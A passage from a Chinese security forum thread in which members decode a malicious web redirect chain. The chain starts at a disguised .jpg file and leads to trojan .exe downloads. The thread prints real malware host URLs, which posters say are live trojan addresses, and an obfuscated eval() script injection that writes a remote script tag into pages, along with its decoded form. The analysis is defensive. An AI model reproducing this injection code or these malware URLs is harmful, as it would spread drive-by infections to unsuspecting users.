囧一个paipai（4th继续更新）

Hopesky

回复 9# schumi小粉


    为啥偶啥都没发现？

难道他故意躲着我？嫌我RP太差？

schumi小粉

回复 11# Hopesky


    呵呵，没什么，大意了呗~

cchao21

随便提取个试试。

关于:hxxp://www.mallshop.com.cn/taobao/shuju/m04.jpg解密的日志(全体输出 -  6):

Level  0>http://www.mallshop.com.cn/taobao/shuju/m04.jpg
Level  1>http://bbs.xcdx169.net/include/log.js?FCXYXAJO
Level  2>http://bbs.xcdx169.net/newbbs/logo.htm?人05
Level  3>http://bbs.xcdx169.net/newbbs/b1.jpg
Level  3>http://bbs.xcdx169.net/newbbs/a1.jpg
Level  4>http://www.xcrc114.com/photo/Data/75.exe  ●

解密：cchao21(打点的均为真实木马地址)

ryota

bbs.xcdx169.net 这个站一直没人管

Hopesky

回复 13# cchao21


    为什么我解出来是这个？

关于:hxxp://www.mallshop.com.cn/taobao/shuju/m04.jpg解密的日志(全体输出 -  7):

Level  1>hxxp://www.4fuu.com/ad.js?HIRYRA
Level  2>hxxp://www.4fuu.com
Level  2>hxxp://www.mallshop.com.cn/js/js.js
Level  2>hxxp://www.mallshop.com.cn/js/tj.js
Level  1>hxxp://www.mallshop.com.cn/taobao/shuju/m04.jpg
Level  1>hxxp://www.4fuu.com/ad.js?hiryra
Level  2>hxxp://www.4fuu.com

By   XE鼓

幸福的猪猪

回复 15# Hopesky


未修改前的代码：

1. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4.5(\'<0 3=2 1="6://d.7.c/b/a.8?9"></0>\')',14,14,'script|src|javascript|language|document|writeln|http|xcdx169|js|FCXYXAJO|log|include|net|bbs'.split('|'),0,{}));}

复制代码

修改之后的代码：

1. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4.5("<0 3=2 1=6://d.7.c/b/a.8?9></0>")',14,14,'script|src|javascript|language|document|writeln|http|xcdx169|js|FCXYXAJO|log|include|net|bbs'.split('|'),0,{}));

复制代码

把修改之后的代码，代入redoce，进行eval清除，就可以得出：

1. document.writeln("<script language=javascript src=http://bbs.xcdx169.net/include/log.js?FCXYXAJO></script>")

复制代码

Hopesky

回复 16# 幸福的猪猪


    怎么改？

Hopesky

回复 16# 幸福的猪猪


    语法错误

Hopesky

关于:解密的日志(全体输出 -  7):

Level  1>hxxp://bbs.xcdx169.net/include/log.js?FCXYXAJO
Level  2>hxxp://web2.51.la:82/go.asp?svid=4&id=3483742&tpages=+a3742ops+&ttimes=+a3742ot+&tzone=+
Level  2>hxxp://game.hsw.cn/plus/img/ie.html?人05
Level  3>hxxp://game.hsw.cn/plus/img/images.gif
Level  3>hxxp://game.hsw.cn/plus/img/bu.jpg
Level  3>hxxp://game.hsw.cn/plus/img/au.jpg
Level  4>hxxp://www.xcrc114.com/photo/Data/76.exe ●

By   XE鼓

幸福的猪猪

回复 18# Hopesky


很抱歉，没能及时给你解答。

详细情况，我已经在短消息中跟你说明了。


p.s.下午5点过后，我就不上网咯。